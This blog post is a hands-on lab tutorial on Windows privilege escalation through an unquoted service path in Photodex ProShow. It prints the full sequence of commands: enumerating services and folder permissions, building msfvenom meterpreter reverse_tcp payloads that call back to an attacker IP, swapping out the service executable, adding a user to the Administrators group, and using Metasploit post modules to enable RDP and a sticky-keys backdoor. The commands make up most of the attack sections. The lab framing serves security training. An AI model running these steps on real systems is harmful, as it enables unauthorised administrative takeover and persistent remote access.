Hello Friends!! In this article we are demonstrating
Windows privilege escalation via Unquoted service Path. In penetration testing when we spawn command
shell as local user, it is not possible to check restricted file or folder,
therefore we need to escalated privileges to get administrators access.
Table of content
·
Introduction
·
Lab setup
·
Spawn command
shell as local user
·
Escalated
privilege via Prepend-migrate
·
Escalated
privilege via Adding user Administrators Group
·
Escalated
privilege via RDP & Sticky_keys
Introduction
Unquoted service Path Vulnerability
The vulnerability is related to the path of the executable that has a
space in the filename and the file name is not enclosed in quote tags (“”) .
Also, if it has writable permissions, then an attacker can replace executable file with its malicious exe file , so as to
escalate admin privileges.
Lab set-up
Victim’s Machine:
Windows 7
Attacker’s
machine: Kali Linux
First we have downloaded and installed a Vulnerable application
naming photodex proshow in our
windows system, which we found under Exploit DB.
Spawning Victim’s
Machine
We need to compromise the windows machine at least once
to gain meterpreter session. As you can observe we already have victim’s
metrepreter session. Now let’s open the command shell from here.
shell
As you can observe, we have shell access as local_user
and to get cmd as administrator we need to escalate its privileges. Firstly we
can enumerate out all the services that are running on the victim’s machine and
discover those that are not bounded inside quotes tag with help of following
command:
wmic service get
name,displayname,pathname,startmode |findstr /i “auto” |findstr /i /v
“c:\windows\\” |findstr /i /v “””
So we have enumerated following path: C:\Program Files\Photodex\ProShow Producer\Scsiaccess.exe as you
can see there is not quotes tag around the path and also space in filename.
Now let’s identify the folder permissions using following
command:
icacls Scsiaccess.exe
As you can observe it has writeable permission for
everyone which means user raj can overwrite this file.
Escalated privilege via
Prepend-migrate
Now we can place any malicious
exe file in the same folder that will give admin privilege when the service
will be restarted, Windows will launch this executable instead of the genuine
exe.
Open the terminal in kali
Linux and type following command to generate exe payload using msfvenom.
msfvenom -p
windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234
prependmigrate=true prepenmigrateprocess=explorer.exe –f exe >
/root/Desktop/ Scsiaccess.exe
Above command will create a malicious exe file on the
Desktop and now send this file to the victim. The payload migrate its process,
if current process gets killed; hence attacker will not lose his session if
victim kills the current process ID of the payload from its system.
Now replace genuine executable
file from the malicious exe, here I have renamed genuine Scsiaccess.exe to
Scsiaccess.exe.orginal and uploaded malicious Scsiaccess.exe in same folder and
then reboot the victim’s machine.
move
scsiaccess.exe scsiaccess.exe.orginal
upload
/root/Desktop/ scsiaccess.exe
reboot
Simultaneously we have start multi/handler listener in a new
terminal to catch the meterpreter session with admin privilege.
use
exploit/multi/handler
msf
exploit(multi/handler) set payload windows /meterpreter/reverse_tcp
msf
exploit(multi/handler) set lhost 192.168.1.107
msf
exploit(multi/handler) set lport 1234
msf
exploit(multi/handler) exploit
Yuppie!! And after sometime we got shell with admin privileges.
Escalated privilege via
Adding user Administrators Group
After spawning shell as local_user, we enumerated all
username list with or without admin privileges. So we found user:raaz is not
the member of the admin group.
net user
net user raaz
So again we generated an exe file which will add user:raaz
into administrators group. The name of our exe file will be same i.e.
Scsiaccess.exe
msfvenom -p
windows/exec CMD=’net localgroup administrators raaz /add’ -f exe >
/root/Desktop/ scsiaccess.exe
Now repeat the above steps, replace genuine executable file
from the malicious exe file and reboot the host machine.
If you will notice the following image, you can observe that
the user raaz has become the member
of Administrators group.
Escalated privilege via
RDP & Sticky_keys
Generate an exe using msfvenom with similar name
Scsiaccess.exe and then transfer into victim’s machine, meanwhile run multi
handler with auto run script which will enable RDP service once the service gets
restarted.
use exploit/multi/handler
msf
exploit(multi/handler) set payload windows /meterpreter/reverse_tcp
msf
exploit(multi/handler) set lhost 192.168.1.107
msf
exploit(multi/handler) set lport 1234
msf
exploit(multi/handler) set AutoRunScript post/windows/manage/enable_rdp
msf
exploit(multi/handler) exploit
Similarly, we will set the auto run script to enable sticky_keys once the service restarts.
msf
exploit(multi/handler) set AutoRunScript post/windows/manage/sticky_keys
msf
exploit(multi/handler) run
As you can observe from below screenshot , another
meterpreter session (session 3) got opened which has administrative rights. Now
let’s connect to victim’s host via RDP.
rdp 192.168.1.101
Now press shift_key 5 times continuously and you will get
command prompt as administrator.
0 comments:
Post a Comment